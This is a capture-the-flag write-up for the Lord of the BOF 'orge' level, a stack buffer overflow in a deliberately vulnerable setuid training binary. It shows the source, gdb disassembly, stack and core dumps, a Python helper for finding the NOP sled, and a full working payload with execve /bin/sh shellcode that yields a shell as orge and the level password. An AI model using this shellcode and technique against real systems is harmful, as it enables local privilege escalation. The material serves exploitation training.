
[LOB] darkelf

 

Intro

Hello!

This time I worked on darkelf..

It was the first time I took apart a core file, and a problem that had me thinking about all sorts of things.

Let's get started.

Write-Up

[darkelf@localhost darkelf]$ ll 
total 20 
-rwsr-sr-x    1 orge     orge        12700 Mar  1  2010 orge 
-rw-r--r--    1 root     root          800 Mar 29  2010 orge.c 
[darkelf@localhost darkelf]$ 
[darkelf@localhost darkelf]$ cat orge.c 
/* 
        The Lord of the BOF : The Fellowship of the BOF 
        - orge 
        - check argv[0] 
*/ 

#include <stdio.h> 
#include <stdlib.h> 

extern char **environ; 

main(int argc, char *argv[]) 
{ 
        char buffer[40]; 
        int i; 

        if(argc < 2){ 
                printf("argv error\n"); 
                exit(0); 
        } 

        // here is changed! 
        if(strlen(argv[0]) != 77){ 
                printf("argv[0] error\n"); 
                exit(0); 
        } 

        // egghunter 
        for(i=0; environ[i]; i++) 
                memset(environ[i], 0, strlen(environ[i])); 

        if(argv[1][47] != '\xbf') 
        { 
                printf("stack is still your friend.\n"); 
                exit(0); 
        } 

        // check the length of argument 
        if(strlen(argv[1]) > 48){ 
                printf("argument is too long!\n"); 
                exit(0); 
        } 

        strcpy(buffer, argv[1]); 
        printf("%s\n", buffer); 

        // buffer hunter 
        memset(buffer, 0, 40); 
}

A check on the length of argv[0] has been added.

I made an orge directory under /tmp and copied the binary there under a name made of 67 "a"s, so that argv[0] ("/tmp/orge/" plus the 67-character name) comes to exactly 77 bytes.

[darkelf@localhost /tmp]$ mkdir orge 
[darkelf@localhost /tmp]$ cd ~ 
[darkelf@localhost darkelf]$ cp orge /tmp/orge/`python -c 'print "a" * 67'`

[darkelf@localhost darkelf]$ cd /tmp/orge

[darkelf@localhost orge]$ ll 
total 14 
-rwsr-sr-x    1 darkelf  darkelf     12700 May  6 08:51 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

[darkelf@localhost orge]$ /tmp/orge/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 1234 
stack is still your friend.

When I ran it, it got past that check without printing "argv[0] error", so the bypass works.

Let's open it up in gdb!

[darkelf@localhost orge]$ gdb -q /tmp/orge/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
(gdb) set disassembly-flavor intel

(gdb) disas main 
Dump of assembler code for function main: 
0x8048500 :       push   %ebp 
0x8048501 <main+1>:     mov    %ebp,%esp 
0x8048503 <main+3>:     sub    %esp,44 
0x8048506 <main+6>:     cmp    DWORD PTR [%ebp+8],1 
0x804850a <main+10>:    jg     0x8048523 <main+35> 
0x804850c <main+12>:    push   0x8048690 
0x8048511 <main+17>:    call   0x8048410  
0x8048516 <main+22>:    add    %esp,4 
0x8048519 <main+25>:    push   0 
0x804851b <main+27>:    call   0x8048420  
0x8048520 <main+32>:    add    %esp,4 
0x8048523 <main+35>:    mov    %eax,DWORD PTR [%ebp+12] 
0x8048526 <main+38>:    mov    %edx,DWORD PTR [%eax] 
0x8048528 <main+40>:    push   %edx 
0x8048529 <main+41>:    call   0x80483f0  
0x804852e <main+46>:    add    %esp,4 
0x8048531 <main+49>:    mov    %eax,%eax 
0x8048533 <main+51>:    cmp    %eax,77 
0x8048536 <main+54>:    je     0x8048550 <main+80> 
0x8048538 <main+56>:    push   0x804869c 
0x804853d <main+61>:    call   0x8048410  
0x8048542 <main+66>:    add    %esp,4 
0x8048545 <main+69>:    push   0 
0x8048547 <main+71>:    call   0x8048420  
0x804854c <main+76>:    add    %esp,4 
0x804854f <main+79>:    nop 
0x8048550 <main+80>:    nop 
0x8048551 <main+81>:    mov    DWORD PTR [%ebp-44],0x0 
0x8048558 <main+88>:    mov    %eax,DWORD PTR [%ebp-44] 
0x804855b <main+91>:    lea    %edx,[%eax*4] 
0x8048562 <main+98>:    mov    %eax,%ds:0x80497d4 
0x8048567 <main+103>:   cmp    DWORD PTR [%eax+%edx],0 
0x804856b <main+107>:   jne    0x8048570 <main+112> 
0x804856d <main+109>:   jmp    0x80485b0 <main+176> 
0x804856f <main+111>:   nop 
0x8048570 <main+112>:   mov    %eax,DWORD PTR [%ebp-44] 
0x8048573 <main+115>:   lea    %edx,[%eax*4] 
0x804857a <main+122>:   mov    %eax,%ds:0x80497d4 
0x804857f <main+127>:   mov    %edx,DWORD PTR [%eax+%edx] 
0x8048582 <main+130>:   push   %edx 
0x8048583 <main+131>:   call   0x80483f0  
0x8048588 <main+136>:   add    %esp,4 
0x804858b <main+139>:   mov    %eax,%eax 
0x804858d <main+141>:   push   %eax 
0x804858e <main+142>:   push   0 
0x8048590 <main+144>:   mov    %eax,DWORD PTR [%ebp-44] 
0x8048593 <main+147>:   lea    %edx,[%eax*4] 
0x804859a <main+154>:   mov    %eax,%ds:0x80497d4 
0x804859f <main+159>:   mov    %edx,DWORD PTR [%eax+%edx] 
0x80485a2 <main+162>:   push   %edx 
0x80485a3 <main+163>:   call   0x8048430  
0x80485a8 <main+168>:   add    %esp,12 
0x80485ab <main+171>:   inc    DWORD PTR [%ebp-44] 
0x80485ae <main+174>:   jmp    0x8048558 <main+88> 
0x80485b0 <main+176>:   mov    %eax,DWORD PTR [%ebp+12] 
0x80485b3 <main+179>:   add    %eax,4 
0x80485b6 <main+182>:   mov    %edx,DWORD PTR [%eax] 
0x80485b8 <main+184>:   add    %edx,47 
0x80485bb <main+187>:   cmp    BYTE PTR [%edx],0xbf 
0x80485be <main+190>:   je     0x80485d7 <main+215> 
0x80485c0 <main+192>:   push   0x80486ab 
0x80485c5 <main+197>:   call   0x8048410  
0x80485ca <main+202>:   add    %esp,4 
0x80485cd <main+205>:   push   0 
0x80485cf <main+207>:   call   0x8048420  
0x80485d4 <main+212>:   add    %esp,4 
0x80485d7 <main+215>:   mov    %eax,DWORD PTR [%ebp+12] 
0x80485da <main+218>:   add    %eax,4 
0x80485dd <main+221>:   mov    %edx,DWORD PTR [%eax] 
0x80485df <main+223>:   push   %edx 
0x80485e0 <main+224>:   call   0x80483f0  
0x80485e5 <main+229>:   add    %esp,4 
0x80485e8 <main+232>:   mov    %eax,%eax 
0x80485ea <main+234>:   cmp    %eax,48 
0x80485ed <main+237>:   jbe    0x8048606 <main+262> 
0x80485ef <main+239>:   push   0x80486c8 
0x80485f4 <main+244>:   call   0x8048410  
0x80485f9 <main+249>:   add    %esp,4 
0x80485fc <main+252>:   push   0 
0x80485fe <main+254>:   call   0x8048420  
0x8048603 <main+259>:   add    %esp,4 
0x8048606 <main+262>:   mov    %eax,DWORD PTR [%ebp+12] 
0x8048609 <main+265>:   add    %eax,4 
0x804860c <main+268>:   mov    %edx,DWORD PTR [%eax] 
0x804860e <main+270>:   push   %edx 
0x804860f <main+271>:   lea    %eax,[%ebp-40] 
0x8048612 <main+274>:   push   %eax 
0x8048613 <main+275>:   call   0x8048440  
0x8048618 <main+280>:   add    %esp,8 
0x804861b <main+283>:   lea    %eax,[%ebp-40] 
0x804861e <main+286>:   push   %eax 
0x804861f <main+287>:   push   0x80486df 
0x8048624 <main+292>:   call   0x8048410  
0x8048629 <main+297>:   add    %esp,8 
0x804862c <main+300>:   push   40 
0x804862e <main+302>:   push   0 
0x8048630 <main+304>:   lea    %eax,[%ebp-40] 
0x8048633 <main+307>:   push   %eax 
0x8048634 <main+308>:   call   0x8048430  
0x8048639 <main+313>:   add    %esp,12 
0x804863c <main+316>:   leave 
0x804863d <main+317>:   ret 
0x804863e <main+318>:   nop 
0x804863f <main+319>:   nop 
End of assembler dump. 
(gdb) b *main+280 
Breakpoint 1 at 0x8048618

I set a breakpoint right after the strcpy call.

As in the previous problem, argv[1] fills the buffer, SFP and RET, and argv[2] holds the NOP sled and the shellcode.

(gdb) r `python -c 'print "A" * 44 + "BBB" + "\xbf"'` `python -c 'print "\x90" * 100 + "CCCC"'` 
Starting program: /tmp/orge/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa `python -c 'print "A" * 44 + "BBB" + "\xbf"'` `python -c 'print "\x90" * 100 + "CCCC"'` 

Breakpoint 1, 0x8048618 in main () 
(gdb) x/200wx $esp 
0xbffff9e4:     0xbffff9f0      0xbffffbac      0x00000014      0x41414141 
0xbffff9f4:     0x41414141      0x41414141      0x41414141      0x41414141 
0xbffffa04:     0x41414141      0x41414141      0x41414141      0x41414141 
0xbffffa14:     0x41414141      0x41414141      0xbf424242      0x00000000 
0xbffffa24:     0xbffffa64      0xbffffa74      0x40013868      0x00000003 
0xbffffa34:     0x08048450      0x00000000      0x08048471      0x08048500 
0xbffffa44:     0x00000003      0xbffffa64      0x08048390      0x0804866c 
0xbffffa54:     0x4000ae60      0xbffffa5c      0x40013e90      0x00000003 
0xbffffa64:     0xbffffb5e      0xbffffbac      0xbffffbdd      0x00000000 
0xbffffa74:     0xbffffc46      0xbffffc54      0xbffffc73      0xbffffc95 
0xbffffa84:     0xbffffca2      0xbffffe65      0xbffffe84      0xbffffea1 
0xbffffa94:     0xbffffeb6      0xbffffed5      0xbffffee0      0xbffffef0 
0xbffffaa4:     0xbffffef8      0xbfffff09      0xbfffff13      0xbfffff21 
0xbffffab4:     0xbfffff32      0xbfffff40      0xbfffff4b      0xbfffff5e 
0xbffffac4:     0x00000000      0x00000003      0x08048034      0x00000004 
0xbffffad4:     0x00000020      0x00000005      0x00000006      0x00000006 
0xbffffae4:     0x00001000      0x00000007      0x40000000      0x00000008 
0xbffffaf4:     0x00000000      0x00000009      0x08048450      0x0000000b 
0xbffffb04:     0x000001fa      0x0000000c      0x000001fa      0x0000000d 
0xbffffb14:     0x000001fa      0x0000000e      0x000001fa      0x00000010 
0xbffffb24:     0x0f8bfbff      0x0000000f      0xbffffb59      0x00000000 
0xbffffb34:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffb44:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffb54:     0x00000000      0x38366900      0x742f0036      0x6f2f706d 
0xbffffb64:     0x2f656772      0x61616161      0x61616161      0x61616161 
0xbffffb74:     0x61616161      0x61616161      0x61616161      0x61616161 
0xbffffb84:     0x61616161      0x61616161      0x61616161      0x61616161 
0xbffffb94:     0x61616161      0x61616161      0x61616161      0x61616161 
0xbffffba4:     0x61616161      0x00616161      0x41414141      0x41414141 
0xbffffbb4:     0x41414141      0x41414141      0x41414141      0x41414141 
0xbffffbc4:     0x41414141      0x41414141      0x41414141      0x41414141 
0xbffffbd4:     0x41414141      0xbf424242      0x90909000      0x90909090 
0xbffffbe4:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffbf4:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffc04:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffc14:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffc24:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffc34:     0x90909090      0x90909090      0x90909090      0x43434390 
0xbffffc44:     0x00000043      0x00000000      0x00000000      0x00000000 
0xbffffc54:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc64:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc74:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc84:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc94:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffca4:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffcb4:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffcc4:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffcd4:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffce4:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffcf4:     0x00000000      0x00000000      0x00000000      0x00000000

I used 0xbffffbf4 as the return address.

[darkelf@localhost orge]$ /tmp/orge/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa `python -c 'print "A" * 44 + "\xf4\xfb\xff\xbf"'` `python -c 'print "\x90" * 100 + "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"'` 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒ 
Segmentation fault (core dumped)

Ta-da!! Failed!!

At this point I honestly couldn't tell what was wrong and spent a long time flailing around..

Why didn't I know about core dumps, such a handy thing ㅠㅠㅠ

The saying "a program dies and leaves a core behind" isn't there for nothing.. it's seriously convenient.

Let's crack open a core for the first time. Exciting!

gdb -q [file] [core] or gdb -q -c [core]

[darkelf@localhost orge]$ gdb -q -c core 
Core was generated by `/tmp/orge/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa A'. 
Program terminated with signal 11, Segmentation fault. 
#0  0xbfffffb3 in ?? () 
(gdb) x/200wx $esp 
0xbffff9a0:     0x00000000      0xbffff9e4      0xbffff9f4      0x40013868 
0xbffff9b0:     0x00000003      0x08048450      0x00000000      0x08048471 
0xbffff9c0:     0x08048500      0x00000003      0xbffff9e4      0x08048390 
0xbffff9d0:     0x0804866c      0x4000ae60      0xbffff9dc      0x40013e90 
0xbffff9e0:     0x00000003      0xbffffad7      0xbffffb25      0xbffffb56 
0xbffff9f0:     0x00000000      0xbffffbea      0xbffffbf8      0xbffffc17 
0xbffffa00:     0xbffffc39      0xbffffc46      0xbffffe09      0xbffffe28 
0xbffffa10:     0xbffffe45      0xbffffe5a      0xbffffe79      0xbffffe84 
0xbffffa20:     0xbffffe94      0xbffffe9c      0xbffffead      0xbffffeb7 
0xbffffa30:     0xbffffec5      0xbffffed6      0xbffffee4      0xbffffeef 
0xbffffa40:     0xbfffff02      0xbfffff52      0xbfffffa2      0x00000000 
0xbffffa50:     0x00000003      0x08048034      0x00000004      0x00000020 
0xbffffa60:     0x00000005      0x00000006      0x00000006      0x00001000 
0xbffffa70:     0x00000007      0x40000000      0x00000008      0x00000000 
0xbffffa80:     0x00000009      0x08048450      0x0000000b      0x000001fa 
0xbffffa90:     0x0000000c      0x000001fa      0x0000000d      0x000001fa 
0xbffffaa0:     0x0000000e      0x000001fa      0x00000010      0x0f8bfbff 
0xbffffab0:     0x0000000f      0xbffffad2      0x00000000      0x00000000 
0xbffffac0:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffad0:     0x36690000      0x2f003638      0x2f706d74      0x6567726f 
0xbffffae0:     0x6161612f      0x61616161      0x61616161      0x61616161 
0xbffffaf0:     0x61616161      0x61616161      0x61616161      0x61616161 
0xbffffb00:     0x61616161      0x61616161      0x61616161      0x61616161 
0xbffffb10:     0x61616161      0x61616161      0x61616161      0x61616161 
0xbffffb20:     0x61616161      0x41414100      0x41414141      0x41414141 
0xbffffb30:     0x41414141      0x41414141      0x41414141      0x41414141 
0xbffffb40:     0x41414141      0x41414141      0x41414141      0x41414141 
0xbffffb50:     0xfffbf441      0x909000bf      0x90909090      0x90909090 
0xbffffb60:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffb70:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffb80:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffb90:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffba0:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffbb0:     0x90909090      0x90909090      0xc0319090      0x80cd31b0 
0xbffffbc0:     0xc189c389      0x46b0c031      0xc03180cd      0x2f2f6850 
0xbffffbd0:     0x2f686873      0x896e6962      0x895350e3      0xb0c289e1 
0xbffffbe0:     0x3180cd0b      0xcd01b0c0      0x00000080      0x00000000 
0xbffffbf0:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc00:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc10:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc20:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc30:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc40:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc50:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc60:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc70:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc80:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc90:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffca0:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffcb0:     0x00000000      0x00000000      0x00000000      0x00000000

Digging through the dead program's core, I could confirm that the NOPs actually sit at 0xbffffb70, not where gdb showed them.

Let's fix the payload and go get a shell!

The attack has to go through a symbolic link to the original file!! (The copy in /tmp is owned by darkelf, as the ll output above shows, so its setuid bit no longer gives orge's privileges.)
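
Here is a small parser, added for this write-up and not part of the original post, that turns gdb `x/Nwx` rows into a byte map (respecting x86 little-endian word order) and finds the longest run of 0x90 bytes, so the sled's real start can be read off each dump instead of eyeballed; the embedded rows are copied from the two dumps above.

```python
import re
# Rows from the two `x/200wx $esp` dumps above: the gdb run first, then the core dump.
GDB_ROWS = """
0xbffffbd4:     0x41414141      0xbf424242      0x90909000      0x90909090
0xbffffbe4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbf4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc04:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc14:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc24:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc34:     0x90909090      0x90909090      0x90909090      0x43434390
"""
CORE_ROWS = """
0xbffffb50:     0xfffbf441      0x909000bf      0x90909090      0x90909090
0xbffffb60:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb70:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb80:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb90:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffba0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbb0:     0x90909090      0x90909090      0xc0319090      0x80cd31b0
"""
_ROW = re.compile(r"^\s*(0x[0-9a-f]+):((?:\s+0x[0-9a-f]{8})+)\s*$", re.I)


def parse_gdb_words(dump):
    """Map address -> byte; gdb prints each word big-endian, x86 stores it little-endian."""
    mem = {}
    for line in dump.splitlines():
        m = _ROW.match(line)
        if not m:
            continue  # prompt, blank line or pager line
        addr = int(m.group(1), 16)
        for word in m.group(2).split():
            mem.update(zip(range(addr, addr + 4), int(word, 16).to_bytes(4, "little")))
            addr += 4
    return mem


def longest_run(mem, value):
    """(start, length) of the longest run of `value` at contiguous addresses, or None."""
    best, start, length, prev = None, 0, 0, None
    for addr in sorted(mem):
        if mem[addr] != value:
            length = 0                       # run broken by a different byte
        elif length and addr == prev + 1:
            length += 1                      # extends the current run
        else:
            start, length = addr, 1          # new run (also after a gap in the dump)
        if length and (best is None or length > best[1]):
            best = (start, length)
        prev = addr
    return best
```

It reports the 100-byte sled at 0xbffffbdd in the gdb run but at 0xbffffb56 in the core, 0x87 bytes lower, which is why the first payload's 0xbffffbf4 landed past the sled's real end.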

[darkelf@localhost orge]$ ln -s ~/orge /tmp/orge/`python -c 'print "b" * 67'`
[darkelf@localhost orge]$ ll 
total 14 
-rwsr-sr-x    1 darkelf  darkelf     12700 May  6 08:51 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
lrwxrwxrwx    1 darkelf  darkelf        18 May  6 08:52 bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb -> /home/darkelf/orge
[darkelf@localhost orge]$ /tmp/orge/bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb `python -c 'print "A" * 44 + "\x70\xfb\xff\xbf"'` `python -c 'print "\x90" * 100 + "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"'` 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAp▒▒▒ 
bash$ id 
uid=507(orge) gid=506(darkelf) egid=507(orge) groups=506(darkelf) 
bash$ /bin/my-pass 
euid = 507 
timewalker

Exploit!

Wrap-up

A tiger dies and leaves its skin; a program dies and leaves a core.

Learned one more thing today. Feels good haha

See you at the next problem :D

 
